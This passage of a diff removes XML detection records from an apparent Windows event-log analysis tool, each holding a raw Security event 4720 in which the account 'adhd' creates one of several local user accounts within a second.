-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.7637149Z'/&gt;&lt;EventRecordID&gt;5149&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Mary&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1184&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Mary&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Mary</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5143</recordid>
-            <time>2020-06-11 22:05:08.689473900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.6894739Z'/&gt;&lt;EventRecordID&gt;5143&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Martha&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1183&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Martha&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Martha</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5137</recordid>
-            <time>2020-06-11 22:05:08.604417600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.6044176Z'/&gt;&lt;EventRecordID&gt;5137&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Betty&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1182&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Betty&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Betty</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5131</recordid>
-            <time>2020-06-11 22:05:08.512463900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.5124639Z'/&gt;&lt;EventRecordID&gt;5131&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Shirley&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1181&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Shirley&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Shirley</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5125</recordid>
-            <time>2020-06-11 22:05:08.423919600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.4239196Z'/&gt;&lt;EventRecordID&gt;5125&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joyce&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1180&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joyce&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joyce</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5119</recordid>
-            <time>2020-06-11 22:05:08.331315700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.3313157Z'/&gt;&lt;EventRecordID&gt;5119&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jerry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1179&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jerry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jerry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5113</recordid>
-            <time>2020-06-11 22:05:08.242848800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.2428488Z'/&gt;&lt;EventRecordID&gt;5113&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Dennis&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1178&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Dennis&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Dennis</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5107</recordid>
-            <time>2020-06-11 22:05:08.126596200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.1265962Z'/&gt;&lt;EventRecordID&gt;5107&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jack&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1177&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jack&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jack</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5101</recordid>
-            <time>2020-06-11 22:05:08.27083700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.0270837Z'/&gt;&lt;EventRecordID&gt;5101&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gregory&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1176&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gregory&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gregory</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5095</recordid>
-            <time>2020-06-11 22:05:07.926663000Z</time>
-            <channel>Security</channel>
